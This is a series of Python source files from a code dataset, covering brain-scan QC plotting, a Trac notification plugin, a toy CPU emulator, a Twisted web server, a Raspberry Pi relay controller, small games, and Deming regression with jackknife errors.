FONOV\n# @date 14/08/2015\n#\n# Longitudinal pipeline resampling\n\nimport shutil\nimport os\nimport sys\nimport csv\nimport traceback\n\n# MINC stuff\nfrom ipl.minc_tools import mincTools,mincError\nfrom ipl.minc_qc import qc,qc_field_contour\n\n\ndef draw_qc_stx(in_scan,in_outline,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_outline.scan,\n mask_range=[0.0,1.0])\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_outline.scan,\n mask_range=[0.0,1.0],\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_mask(in_scan,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_scan.mask,\n mask_range=[0.0,1.0])\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_scan.mask,\n mask_range=[0.0,1.0],\n mask_bg=0.5, use_max=True)\n\ndef draw_qc_cls(in_scan,in_cls,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_cls.scan,\n mask_range=[0.0,3.5],\n spectral_mask=True)\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_cls.scan,\n mask_range=[0.0,3.5],\n mask_cmap='spectral',\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_lobes(in_scan,in_lobes,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan.scan,out_qc.fname,\n big=True,mask=in_lobes.scan,\n spectral_mask=True)\n else:\n qc(in_scan.scan,out_qc.fname,\n mask=in_lobes.scan,\n mask_cmap='spectral',\n mask_bg=0.5, use_max=True)\n\n\ndef draw_qc_add(in_scan1,in_scan2,out_qc,options={}):\n if options.get('big'):\n with mincTools() as m:\n m.qc(in_scan1.scan,out_qc.fname,\n big=True,red=True,\n mask=in_scan2.scan,\n green_mask=True)\n else:\n qc(in_scan1.scan,out_qc.fname,\n mask=in_scan2.scan,\n image_cmap='red',\n mask_cmap='green',\n mask_bg=0.5, use_max=True)\n\ndef draw_qc_nu(in_field,out_qc,options={}):\n qc_field_contour(in_field.scan,out_qc.fname,\n image_cmap='jet')\n\n\n# kate: space-indent on; indent-width 4; indent-mode python;replace-tabs on;word-wrap-column 80\n","sub_path":"ipl/lp/qc.py","file_name":"qc.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"3275376","text":"\nimport pandas\n\nfrom sklearn import naive_bayes\n\nfrom sklearn import datasets;\n\n\n\ndef pandasFun():\n\n dataInfo = pandas.read_fwf(\"brain_body.txt\")\n\n x_values = dataInfo['Brain']\n y_values = dataInfo['Body']\n\n return x_values, y_values\n\n\n\ndef bayesTest():\n iris = datasets.load_iris()\n\n gnb = naive_bayes.GaussianNB()\n\n trainData = gnb.fit(iris.data, iris.target)\n\n y = trainData.predict(iris.data)\n\n\n print(iris.data.shape[0])\n\n\n\n\nif __name__ == \"__main__\":\n\n x, y = pandasFun();\n\n len = len(x)\n\n\n\n bayesTest()","sub_path":"SourceCode/trainCode/regression/pandasTest.py","file_name":"pandasTest.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"168669680","text":"from trac.core import Component, implements\nfrom announcerplugin.api import IAnnouncementSubscriber, istrue\nfrom announcerplugin.api import IAnnouncementPreferenceProvider\nfrom trac.ticket import model\nfrom trac.web.chrome import add_warning\nfrom trac.config import ListOption\nimport re\n\nclass TicketCustomFieldSubscriber(Component):\n implements(IAnnouncementSubscriber)\n\n custom_cc_fields = ListOption('announcer', 'custom_cc_fields',\n 
doc=\"Field names that contain users that should be notified on \"\n \"ticket changes\")\n \n def get_subscription_realms(self):\n return ('ticket',)\n \n def get_subscription_categories(self, realm):\n if realm == \"ticket\":\n return('changed', 'created', 'attachment added')\n else:\n ()\n \n def get_subscriptions_for_event(self, event):\n if event.realm == 'ticket':\n ticket = event.target\n if event.category in ('changed', 'created', 'attachment added'):\n for sub in self._get_membership(event.target):\n yield sub\n\n def _get_membership(self, ticket):\n for field in self.custom_cc_fields:\n subs = ticket[field] or ''\n for chunk in re.split('\\s|,', subs):\n chunk = chunk.strip()\n if not chunk or chunk.startswith('@'):\n continue\n if '@' in chunk:\n address = chunk\n name = None\n else:\n name = chunk\n address = None\n if name or address:\n self.log.debug(\"TicketCustomFieldSubscriber \" \\\n \"added '%s <%s>'\"%(name,address))\n yield ('email', name, name and True or False, address)\n\n","sub_path":"announcerplugin/0.11/announcerplugin/subscribers/ticket_custom.py","file_name":"ticket_custom.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"424017647","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\n\"\"\" \nls8.py runs this code:\n\n cpu = CPU()\n\n cpu.load()\n cpu.run()\n\n\"\"\"\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256\n self.reg = [0] * 8\n self.running = False\n \n self.pc = 0\n \n # stack pointer initializes at ram[f4]\n # f4 | 244 | 0b11110100\n # hex: 0xf4 | binary: 0b11110100\n self.sp = 0xf4\n\n # MAR = Memory Address Register\n # MDR = Memory Data Register\n\n # using \"addr\" and \"data\" for readability\n\n def ram_read(self, addr):\n return self.ram[addr]\n\n def ram_write(self, addr, data):\n self.ram[addr] = data\n\n # load from file\n # ---------------------------------\n # sys.argv[1] reads the user's cmd line input after this python filename\n # int(\"num_string\", 2) converts binary string to int\n\n def load(self):\n \"\"\"Load a program into memory.\"\"\"\n\n\n #program starts at ram[0]\n ram_addr = 0\n\n program = []\n program_file = open(sys.argv[1], 'r')\n\n for line in program_file:\n if line[0]==\"#\":\n continue\n \n elif line[0].isspace()==True:\n continue\n\n else:\n formatted_line = int(line[0:8],2)\n program.append(formatted_line)\n\n # print(program)\n program_file.close()\n\n # load each parsed line into the ram starting at 0\n for instruction in program:\n self.ram[ram_addr] = instruction\n ram_addr += 1\n\n\n # ALU - returns math calculations on op_a and op_b\n # ---------------------------------\n # Does not increment the pc\n\n def alu(self, op, reg_a, reg_b):\n \"\"\"ALU operations.\"\"\"\n\n if op == \"ADD\":\n self.reg[reg_a] += self.reg[reg_b]\n #elif op == \"SUB\": etc\n elif op == \"MUL\":\n self.reg[reg_a] *= self.reg[reg_b]\n else:\n raise Exception(\"Unsupported ALU operation\")\n\n\n # Trace - run self.trace() to debug\n # ---------------------------------\n def trace(self):\n \"\"\"\n Handy function to print out the CPU state. 
You might want to call this\n from run() if you need help debugging.\n \"\"\"\n\n print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n self.pc,\n #self.fl,\n #self.ie,\n self.ram_read(self.pc),\n self.ram_read(self.pc + 1),\n self.ram_read(self.pc + 2)\n ), end='')\n\n for i in range(8):\n print(\" %02X\" % self.reg[i], end='')\n print()\n \n\n # Running Loop\n # ---------------------------------\n def run(self):\n \"\"\"Run the CPU.\"\"\"\n self.running = True\n\n\n # Run Opcodes\n # ---------------------------------\n # HLT | 1 | 0b00000001\n def run_hlt(self):\n # Stop the program\n # print(\"HALT\")\n self.running = False\n\n # TODO RET | 17 | 0b00010001\n def run_ret(self):\n # return from the subroutine\n # pop the value from the top of the stack\n # store the value in the pc (program counter)\n # print(\"RET\")\n self.sp += 1 \n self.pc = self.ram[self.sp]\n\n # PUSH | 69 | 0b1000101\n def run_push(self):\n # push a value to the stack\n # copy the value in reg[op_a] to ram[sp]\n self.ram[self.sp] = self.reg[operand_a]\n # print(f\"PUSH: {self.reg[operand_a]} to ram[{self.sp}] from reg[{operand_a}]\")\n\n # decrement the stack pointer (sp)\n self.sp -= 1\n\n self.pc += 2\n\n # POP | 70 | 0b01000110 \n def run_pop(self):\n # pop the value at the top of the stack\n # into reg[op_a]\n # increment stack pointer\n self.sp += 1\n self.reg[operand_a] = self.ram[self.sp]\n # print(f\"POP: {self.ram[self.sp]} to reg[{operand_a}] from ram[{self.sp}]\")\n\n self.pc += 2\n\n # PRN | 71 | 0b01000111\n def run_prn(self):\n # print the value at reg[op_a]\n # print(f\"PRN: {self.reg[operand_a]} from reg[{operand_a}]\")\n print(self.reg[operand_a])\n self.pc += 2\n\n # CALL | 80 | 0b01010000 \n def run_call(self):\n # calls a subroutine\n # jumps to address stored in reg[op_a]\n # address to return to AFTER the call is pushed to the stack\n\n # print(f\"CALL: a:{operand_a}\")\n # push next address to stack\n self.ram[self.sp] = self.pc + 2\n self.sp -= 1\n\n # set PC to stored address\n self.pc = self.reg[operand_a]\n\n # LDI | 130 | 0b10000010\n def run_ldi(self):\n # load integer(op_b) into reg[op_a]\n # print(f\"LDI: load {operand_b} to reg[{operand_a}]\")\n self.reg[operand_a] = operand_b\n\n self.pc += 3 \n\n # ADD (alu) | 160 | 0b10100000 \n def run_add(self):\n # using the ALU: reg[op_a] += reg[op_b]\n # print(\"ADD\")\n self.alu(\"ADD\",operand_a,operand_b)\n self.pc += 3\n\n # MUL (alu) | 162 | 0b10100010\n def run_mul(self):\n # using the ALU: reg[op_a] *= reg[op_b]\n # print(\"MUL\")\n self.alu(\"MUL\",operand_a,operand_b)\n self.pc += 3\n\n\n # Select & Dispatch Opcodes\n # ---------------------------------\n dispatch = {\n # HLT | 1 | 0b00000001\n 0b00000001: run_hlt,\n # RET | 17 | 0b00010001\n 0b00010001: run_ret,\n # PUSH | 69 | 0b1000101\n 0b1000101: run_push,\n # POP | 70 | 0b01000110 \n 0b01000110: run_pop,\n # PRN | 71 | 0b01000111\n 0b01000111: run_prn,\n # CALL | 80 | 0b01010000 \n 0b1010000: run_call,\n # LDI | 130 | 0b10000010\n 0b10000010: run_ldi,\n # ADD (alu) | 160 | 0b10100000\n 0b10100000: run_add,\n # MUL (alu) | 162 | 0b10100010\n 0b10100010: run_mul,\n }\n\n cmd_list = dispatch.keys()\n\n\n # Loop Starts\n # ---------------------------------\n while self.running == True:\n # run this for debugging\n # self.trace()\n\n # fetch command using program counter\n cmd_code = self.ram[self.pc]\n\n operand_a = self.ram[self.pc + 1]\n operand_b = self.ram[self.pc + 2]\n\n if cmd_code in cmd_list:\n # valid command, dispatch a function\n # print(\"cmd:\",cmd_code)\n 
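# note: these opcode handlers are defined inside run(), so when they are\n                # dispatched they read operand_a / operand_b from this scope as closures\n                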
cmd_run=dispatch[cmd_code](self)\n\n            else:\n                # command not recognized\n                # to print binary add :b\n                print(f\"I don't understand the command at ram[{self.pc}]: {self.ram[self.pc]} | {self.ram[self.pc]:b}\")\n                print(\"Program exited\")\n                self.running = False\n","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":7104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"117097632","text":"import pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\n\n# Load the training data from the csv file\ntraining_data_df = pd.read_csv(\"./dataset/sales_data_training.csv\", dtype=float)\n\n# Split inputs and outputs\nX_training = training_data_df.drop('销售总额', axis=1).values\nY_training = training_data_df[['销售总额']].values\n\n# Load the test data\ntest_data_df = pd.read_csv(\"./dataset/sales_data_testing.csv\", dtype=float)\n\n# Split inputs and outputs\nX_testing = test_data_df.drop('销售总额', axis=1).values\nY_testing = test_data_df[['销售总额']].values\n\n# Normalize the data: a single scaler could also be used, as in the keras tutorial\nX_scaler = MinMaxScaler(feature_range=(0, 1))\nY_scaler = MinMaxScaler(feature_range=(0, 1))\n\n# Normalize both inputs and outputs\nX_scaled_training = X_scaler.fit_transform(X_training)\nY_scaled_training = Y_scaler.fit_transform(Y_training)\n\n# Very important: training data and test data must use the same normalization\nX_scaled_testing = X_scaler.transform(X_testing)\nY_scaled_testing = Y_scaler.transform(Y_testing)\n\nprint(X_scaled_testing.shape)\nprint(Y_scaled_testing.shape)\n\nprint(\"Note: Y values were scaled by multiplying by {:.10f} and adding {:.4f}\".format(Y_scaler.scale_[0], Y_scaler.min_[0]))\n","sub_path":"tutorials/pytorch-tutorial/01.load_data.py","file_name":"01.load_data.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"419286127","text":"import sys, traceback\nsys.path.insert(0, \"/Life/360io/service/io360/patch\")\nsys.path.insert(0, \"/Life/360io/service\")\n\nimport os.path, time\nimport io360.server\nfrom hack.web2 import server, http, resource, channel, iweb, stream, static\nfrom twisted.internet import defer\nfrom Cheetah.Template import Template\nfrom io360 import import_mod, settings\nfrom io360.server.www import import_tmpl\nfrom io360.libs.utils import HardResponder\nfrom io360.server.www.bindings import middleware_bindings\nfrom io360.libs.orm.query import Query\n\nlogic_tree = dict()\nview_tree = dict()\n\nclass IO360HTTP(resource.Resource):\n    addSlash = True\n    \n    def __init__(self, logic_mod, path, mode = 'http'):\n        self.logic_mod = logic_mod\n        self.path = path\n        self.mode = mode\n        \n        if '__val__' not in view_tree:\n            logic_tree['__val__'] = import_mod('.'.join([self.logic_mod,'index']))\n            view_tree['__val__'] = import_tmpl('index')\n\n    def locateChild(self, req, segs):\n        for binding in middleware_bindings:\n            binding(req)\n        \n        try:\n            [self.mode, name] = segs[0].split('-')\n        except:\n            name = segs[0]\n        \n        if name == '' and len(segs) == 1:\n            return self, server.StopTraversal\n        if os.path.isfile(os.path.join(self.path, name)):\n            return IO360HTTPStatic(self, os.path.join(self.path, name)), []\n        elif os.path.exists(os.path.join(self.path, name)):\n            return IO360HTTPStatic(self, os.path.join(self.path, name)), segs[1:]\n        else:\n            logicpath = '.'.join([self.logic_mod,name])\n\n            if name not in view_tree:\n                try:\n                    try:\n                        logic_tree[name] = {'__val__':import_mod(logicpath)}\n                    except:\n                        pass\n\n                    view_tree[name] = {'__val__':import_tmpl(name)}\n                except:\n                    return self, server.StopTraversal\n\n            return IO360HTTPView(self, name, view_tree[name], logicpath, 
logic_tree[name], self.mode), segs[1:]\n\n def renderHTTP(self, req): \n responder = getattr(logic_tree['__val__'], self.mode, logic_tree['__val__'].http)(req)\n view = view_tree['__val__']()\n view.req = req\n \n response = http.Response(200, stream=stream.MemoryStream(view.respond().encode('utf8')))\n response.headers.setRawHeaders('Content-Type', ['text/html; charset=utf-8'])\n \n if responder:\n responder(response)\n return response \n\nclass IO360HTTPView(resource.Resource):\n addSlash = True\n\n def __init__(self, root, viewpath, view, logicpath, logic, mode = 'http'):\n self.root = root\n self.viewpath = viewpath\n self.logicpath = logicpath\n self.view = view\n self.logic = logic\n self.mode = mode\n \n def locateChild(self, req, segs):\n name = segs[0]\n \n self.logicpath = '.'.join([self.logicpath,name])\n self.viewpath = '.'.join([self.viewpath,name])\n \n if name == '' and len(segs) == 1:\n return self, server.StopTraversal\n elif name not in self.view:\n try:\n self.view[name] = {'__val__':import_tmpl(self.viewpath)}\n self.view = self.view[name]\n \n try:\n if type(self.logic) is not type([]):\n self.logic[name] = {'__val__':import_mod(self.logicpath)}\n self.logic = self.logic[name]\n except:\n self.logic = [self.logic]\n except:\n return self, server.StopTraversal\n else:\n self.view = self.view[name]\n try:\n if type(self.logic) is not type([]):\n self.logic = self.logic[name]\n except:\n self.logic = self.logic\n return self, segs[1:]\n\n def renderHTTP(self, req):\n if type(self.logic) is type([]):\n self.logic = self.logic[0]\n \n mode = self.mode + '_' + req.method\n logic = getattr(self.logic['__val__'], mode, self.logic['__val__'].http)\n \n if req.method == 'POST':\n return server.parsePOSTData(req).addCallback(self.renderDeferred, *[req, logic])\n else:\n return self.renderDeferred(None, req, logic)\n \n def renderDeferred(self, dcb, req, logic):\n deferredLogic = defer.maybeDeferred(logic, req)\n \n def renderCallback(responder):\n if isinstance(responder, HardResponder):\n return responder.response(getattr(req, 'cookies', None))\n\n view = self.view['__val__']()\n view.req = req\n responseData = view.respond().encode('utf8')\n\n response = http.Response(200, stream=stream.MemoryStream(responseData))\n response.headers.setRawHeaders('Content-Type', ['text/html; charset=utf-8'])\n\n if getattr(req, 'cookies', None):\n response.headers.setHeader('Set-Cookie', req.cookies)\n\n if responder:\n responder(response)\n\n return response\n\n return deferredLogic.addCallback(renderCallback)\n \nclass IO360HTTPStatic(resource.Resource):\n addSlash = True\n\n def __init__(self, root, path):\n self.root = root\n self.path = path\n\n def locateChild(self, req, segs):\n if not segs:\n return None, server.StopTraversal\n\n name = segs[0]\n self.path = os.path.join(self.path, name)\n if not os.path.exists(self.path):\n return None, server.StopTraversal\n elif os.path.isdir(self.path):\n return IO360HTTPStatic(self.root, self.path), segs[1:]\n else:\n return self, server.StopTraversal\n\n def renderHTTP(self, req):\n if os.path.isfile(self.path):\n return static.File(self.path)\n else:\n return http.Response(200, stream=stream.MemoryStream('forbidden'))\n\nsite = server.Site(IO360HTTP('io360.logic', os.path.join(os.path.dirname(os.getcwd()), 'server/www/static')))\n\ntry:\n from twisted.internet import cfreactor\n cfreactor.install()\nexcept:\n try:\n from twisted.internet import epollreactor\n epollreactor.install()\n except:\n pass\n\nfrom twisted.application import service, 
strports\napplication = service.Application(\"io360\")\nservice = strports.service('tcp:1080', channel.HTTPFactory(site))\nservice.setServiceParent(application)","sub_path":"service/io360/bin/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313851441","text":"import asyncio\nimport websockets\nimport json\nimport relay\nimport config\nimport time\nimport threading\nimport mcp3008\nimport time\nimport RPi.GPIO as GPIO\n#from temperature import read_temp\n\nrelaycount = 16\nsensorcount = 16\n# BCM pins.(pin 4 for is for thermometer.)\npinlist = [2, 3, 27, 22, 0, 5, 6, 13, 26, 14, 15, 23, 24, 25, 1, 12]\n\nrelayon = [False] * relaycount\nsensorval = [0] * sensorcount\n\n# status = {\"relayon\":relayon, \"sensorval\":sensorval}\n\ncontroller = relay.RelayControll(pinlist, relaycount)\n\n# controller.turnOnRelay(relaynum,duration)\n\"\"\"time.sleep(2)\ncontroller.turnOffRelay(0)\ncontroller.turnOnRelay(0,5)\ntime.sleep(2)\ncontroller.cleanup()\"\"\"\n\"\"\"\n# Getting temperature and storing in config.status[].\ntemp = read_temp()[0]\nconfig.status[\"temperature\"] = temp\nprint(config.status[\"temperature\"])\nprint(config.temperature)\nprint(time.strftime(\"%H:%M %d %b %Y, %a \"))\n\"\"\"\n# Getting moisture reading and storing in config.status[].\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(16, GPIO.OUT)\ndef get_reading():\n GPIO.output(16, GPIO.HIGH)\n time.sleep(0.1)\n while True:\n for i in range(0, config.numchip):\n for j in range(0, config.numinputs):\n config.reading_arr[i*config.numinputs+j] = mcp3008.readadc(j, i)\n config.status[\"sensorval\"] = config.reading_arr\n # Sleeping to let the thread finnish getting reading.(?)\n time.sleep(0.5)\n GPIO.output(16, GPIO.LOW)\n\n# Getting reading on new thread(in order to parrallelize).\ntry:\n thread = threading.Thread(target=get_reading, args=())\n thread.start()\n\n async def handler(websocket, path):\n consumer_task = asyncio.ensure_future(consumer_handler(websocket))\n producer_task = asyncio.ensure_future(producer_handler(websocket))\n done, pending = await asyncio.wait(\n [consumer_task, producer_task],\n return_when=asyncio.FIRST_COMPLETED,\n )\n\n for task in pending:\n task.cancel()\n\n async def consumer_handler(websocket):\n async for message in websocket:\n await consumer(message)\n\n async def producer_handler(websocket):\n while True:\n message = await producer()\n await websocket.send(message)\n await asyncio.sleep(0.1)\n\n async def consumer(message):\n message = json.loads(message)\n relaynum = int(message[\"relaynum\"])\n config.status[\"duration\"] = int(message[\"duration\"])\n if message[\"turn\"] is True:\n controller.turnOnRelay(relaynum, config.status[\"duration\"])\n\n async def producer():\n message = json.dumps(config.status)\n return message\n\n start_server = websockets.serve(handler, '192.168.1.202',9998)\n #start_server = websockets.serve(handler, '127.0.0.1', 9998)\n # start_server = websockets.serve(handler, '192.168.2.144', 9998)\n # start_server = websockets.serve(handler, '192.168.1.210',9998)\n # start_server = websockets.serve(handler, '192.168.2.100',9998)\n\n asyncio.get_event_loop().run_until_complete(start_server)\n asyncio.get_event_loop().run_forever()\n\nexcept KeyboardInterrupt:\n 
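# on Ctrl-C, release the GPIO pins so the relays are left in a safe state\n    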
controller.cleanup()\n","sub_path":"webtest.py","file_name":"webtest.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"544608322","text":"# peter\n# Created on: Sep 2016\n# Created for: ICS3U\n# This scene shows the main menu.\n\nfrom scene import *\nimport ui\nfrom numpy import random\n\n\nclass main_game_scene(Scene):\n    def setup(self):\n        # this method is called, when user moves to this scene\n        self.size_of_screen_x = self.size.x\n        self.size_of_screen_y = self.size.y\n        self.screen_center_x = self.size_of_screen_x/2\n        self.screen_center_y = self.size_of_screen_y/2\n        \n        self.fishes = []\n        self.fishes_move_speed = 10.0\n        self.scale_size = 0.75\n        self.fish_rate = 1\n        \n        # add background color\n        background_position = Vector2(self.screen_center_x,\n                                      self.screen_center_y)\n        self.background = SpriteNode('./assets/sprites/main_game_scene_one.jpg',\n                                     position = background_position, \n                                     parent = self, \n                                     size = self.size)\n        \n        \n        player_position = Vector2()\n        player_position.x = self.screen_center_x\n        player_position.y = 100\n        self.player = SpriteNode('./assets/sprites/player_fish.PNG',\n                                 parent = self,\n                                 position = player_position,\n                                 scale = 0.1)\n        \n    def update(self):\n        # this method is called, hopefully, 60 times a second\n        fish_create_chance = random.randint(1,25)\n        if fish_create_chance <= self.fish_rate:\n            self.add_fish_three()\n        fish_create_chance = random.randint(1,25)\n        if fish_create_chance <= self.fish_rate:\n            self.add_fish_two()\n        fish_create_chance = random.randint(1,25)\n        if fish_create_chance <= self.fish_rate:\n            self.add_fish()\n        \n        if len(self.fishes) > 0:\n            # iterate over a copy so removing a fish mid-loop is safe\n            for fish_hit in list(self.fishes):\n                if fish_hit.frame.intersects(self.player.frame):\n                    self.player.remove_from_parent()\n                    fish_hit.remove_from_parent()\n                    self.fishes.remove(fish_hit)\n                else:\n                    pass\n        \n    def touch_began(self, touch):\n        # this method is called, when user touches the screen\n        player = self.size/2\n        player.x = player.x+0\n        self.player = SpriteNode('./assets/sprites/player_fish.png')\n        \n        \n    def touch_moved(self, touch):\n        # this method is called, when user moves a finger around on the screen\n        if self.player.frame.contains_point(touch.location):\n            self.player.position = touch.location\n        \n    def touch_ended(self, touch):\n        # this method is called, when user releases a finger from the screen\n        pass\n        \n    def did_change_size(self):\n        # this method is called, when user changes the orientation of the screen\n        # thus changing the size of each dimension\n        pass\n        \n    def pause(self):\n        # this method is called, when user touches the home button\n        # save anything before app is put to background\n        pass\n        \n    def resume(self):\n        # this method is called, when user place app from background \n        # back into use. 
Reload anything you might need.\n pass\n \n def add_fish(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(10, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 100\n fish_end_position.y = random.randint(100,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/small_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.12)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction) \n \n \n def add_fish_two(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(100, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 100\n fish_end_position.y = random.randint(100,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/medium_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.12)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction) \n \n def add_fish_three(self):\n fish_start_position = Vector2()\n fish_start_position.x = self.size_of_screen_x - 100\n fish_start_position.y = random.randint(100, \n self.size_of_screen_y - 100)\n \n fish_end_position = Vector2() \n fish_end_position.x = - 150\n fish_end_position.y = random.randint(10,\n self.screen_center_y - 100)\n \n self.fishes.append(SpriteNode('./assets/sprites/large_fish.PNG',\n position = fish_start_position,\n parent = self,\n scale = 0.18)) \n \n fishMoveAction = Action.move_to(fish_end_position.x,\n fish_end_position.y,\n self.fishes_move_speed,\n TIMING_SINODIAL)\n \n self.fishes[len(self.fishes)-1].run_action(fishMoveAction)\n","sub_path":"main_game_scene_one.py","file_name":"main_game_scene_one.py","file_ext":"py","file_size_in_byte":7249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"140291658","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 8 14:57:52 2019\n\n@author: roman\n\"\"\"\n\n\"\"\"\nScript used for doing DemingRegression with the JackKnife Method\nSource of calculation: https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/NCSS/Deming_Regression.pdf\nImplementation: Roman Wixinger\n\"\"\"\n\n\nimport numpy as np\nfrom scipy.special import erfc\nimport scipy.stats as sts \n\ndef deming_regression(x, y, x_err, y_err, alpha = 0.05):\n \n #Constants used for calculating the fit parameters\n x_bar = np.mean(x) \n y_bar = np.mean(y)\n \n n = len(x)\n \n #Covariation matrix\n cov = np.cov(x,y)\n \n p = cov[1,0] #np.sum((x - x_bar * n_arr) * (y - y_bar * n_arr))\n u = cov[0,0] #np.sum((x - x_bar * n_arr)**2)\n q = cov[1,1] #np.sum((y - y_bar * n_arr)**2)\n \n #Variation of the error in x and y\n V_epsilon = np.sum(x_err)**2 / n\n V_delta = np.sum(y_err)**2 / n\n \n #Ratio of the error -> Which deviation should be weighted more\n Lambda = V_epsilon / V_delta\n \n #Calculate the fit parameters\n b1 = (Lambda * q - u + np.sqrt((u - Lambda*q)**2 + 4*Lambda*p**2))/(2*Lambda*p)\n b0 = y_bar - b1*x_bar\n \n fitparam = np.array([b1, b0])\n fit_function = np.poly1d(fitparam) \n \n return fitparam, fit_function\n\n\ndef jackKnife(x, 
y, x_err, y_err, alpha = 0.05):\n \"\"\"\n Input: theta\n Source: https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/NCSS/Deming_Regression.pdf\n Return: SE(theta) the jackknife estimation for the standard error\n \"\"\"\n \n x_bar = np.mean(x) \n n = len(x)\n\n #Get the estimation \n fitparam, _ = deming_regression(x, y, x_err, y_err)\n theta_b1 = fitparam[0]\n theta_b0 = fitparam[1]\n \n # i-th pseudovariate to be calculated in loop\n theta_star_b1 = np.zeros_like(x)\n theta_star_b0 = np.zeros_like(x)\n \n for i in range(n):\n x_i = np.delete(x, i)\n y_i = np.delete(y, i)\n x_err_i = np.delete(x_err, i)\n y_err_i = np.delete(y_err, i)\n \n #Calculate estimate from sample without i\n fitparam_i, _ = deming_regression(x_i, y_i, x_err_i, y_err_i)\n theta_b1_i = fitparam_i[0]\n theta_b0_i = fitparam_i[1]\n \n #Estimate i-th pseudovariate\n theta_star_b1[i] = n*theta_b1 - (n-1)*theta_b1_i\n theta_star_b0[i] = n*theta_b0 - (n-1)*theta_b0_i\n \n #Estimation for b1, b0 with the jackKnife method\n theta_jackKnife_b1 = np.sum(theta_star_b1) / n\n theta_jackKnife_b0 = np.sum(theta_star_b0) / n\n \n #Variance calculation\n V_J_b1 = np.sum((theta_jackKnife_b1*np.ones_like(theta_star_b1) - theta_star_b1)**2) / (n-1)\n V_J_b0 = np.sum((theta_jackKnife_b0*np.ones_like(theta_star_b0) - theta_star_b0)**2) / (n-1)\n \n #Jackknife estimate for the standard error without tna\n SE_b1 = np.sqrt(V_J_b1 / n)\n SE_b0 = np.sqrt(V_J_b0 / n)\n \n #Student-T: https://docs.scipy.org/doc/scipy-0.14.0/reference/generated/scipy.stats.t.html\n tna = sts.t.ppf(1.0 - alpha / 2.0, n - 2)\n \n #Standard error of fit parameter\n std_b1 = tna * SE_b1\n std_b0 = tna * SE_b0\n \n return std_b1, std_b0","sub_path":"GroveTemp3/DemingRegression.py","file_name":"DemingRegression.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"293658292","text":"from turtle import Turtle, Screen\r\nimport pandas\r\n\r\nscreen = Screen()\r\nscreen.title(\"Indian States Game\")\r\nscreen.setup(600, 600)\r\nscreen.bgpic(\"india.gif\")\r\n\r\nt = Turtle()\r\nt.penup()\r\nt.hideturtle()\r\nt.shapesize(0.1, 0.1)\r\nt.shape(\"circle\")\r\nt.color(\"green\")\r\n\r\ndata = pandas.read_csv(\"indian_states.csv\")\r\nall_states = data.state.to_list()\r\nguessed_states = []\r\nwhile len(guessed_states) < 37:\r\n guess = len(guessed_states)\r\n state = screen.textinput(f\"{guess}/36 states guessed correctly.\", \"What's another state name?\").title()\r\n\r\n if state == \"Exit\" or state == \"exit\":\r\n break\r\n if state in all_states:\r\n guessed_states.append(state)\r\n t.goto(data[data[\"state\"] == state][\"x\"].item(), data[data[\"state\"] == state][\"y\"].item())\r\n t.stamp()\r\n t.write(state, align=\"center\", font=(\"Ariel\", 8, \"bold\"))\r\n","sub_path":"Python/States of india 